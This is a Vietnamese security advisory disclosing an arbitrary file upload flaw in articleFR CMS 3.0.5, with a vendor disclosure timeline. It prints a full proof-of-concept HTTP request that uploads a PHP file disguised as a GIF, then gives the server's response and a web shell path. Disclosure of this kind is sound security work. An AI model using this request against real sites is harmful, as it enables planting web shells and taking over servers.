ITAS Team phát hiện lỗ hổng “Arbitrary File Upload” trong articleFR CMS

ITAS Team đã phát hiện lỗ hổng “Arbitrary File Upload” trong articleFR CMS. Thông qua lỗ hổng này, hacker có thể upload tùy ý các tập tin lên Web Server. Nguyên nhân của lỗ hổng là do dữ chức năng upload kiểm tra định dạng tập tin bằng Javascript ở phía client mà không kiểm tra lại định dạng tập tin ở phía máy chủ.
Các cá nhân và tổ chức đang sử dụng CMS này nên xem xét và đưa ta giải pháp khắc phục.

Thông tin về lỗ hổng:
– Lỗ hổng: Arbitrarily File Upload
– Nhà sản xuất: http://freereprintables.com
– Download link: https://github.com/articlefr/articleFR
– Phiên bản lỗi: version 3.0.5
– Phát hiện bởi: Trần Đình Tiến (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)

Chi tiết về lỗ hổng:

– REQUEST:

POST /articlefr/dashboard/videouploader.php HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/articlefr/dashboard/videos/fileupload/
Content-Length: 414
Content-Type: multipart/form-data; boundary=—————————277651700022570
Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

—————————–277651700022570
Content-Disposition: form-data; name=”myVideo”; filename=”img.php”
Content-Type: image/gif

phpinfo();
?>
—————————–277651700022570
Content-Disposition: form-data; name=””

undefined
—————————–277651700022570
Content-Disposition: form-data; name=””

undefined
—————————–277651700022570–

– RESPONSE:

HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 03:10:30 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: none
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 36

[String_Random].php

– Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php
– Vulnerable file: articlefr/dashboard/videouploader.php
– Vulnerable code:

Công bố thông tin:
– 09/12/2014: Liên hệ nhà sản xuất – nhà sản xuất không phản hồi
– 11/12/2014: Liên hệ nhà sản xuất – nhà sản xuất không phản hồi
– 12/12/2014: Liên hệ nhà sản xuất – nhà sản xuất phản hồi
– 23/12/2014: Gửi thông tin chi tiết cho nhà sản xuất – nhà sản xuất không phản hồi
– 21/01/2015: ITAS Team công bố thông tin

References: http://www.exploit-db.com/exploits/35858/

Demonstration video

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *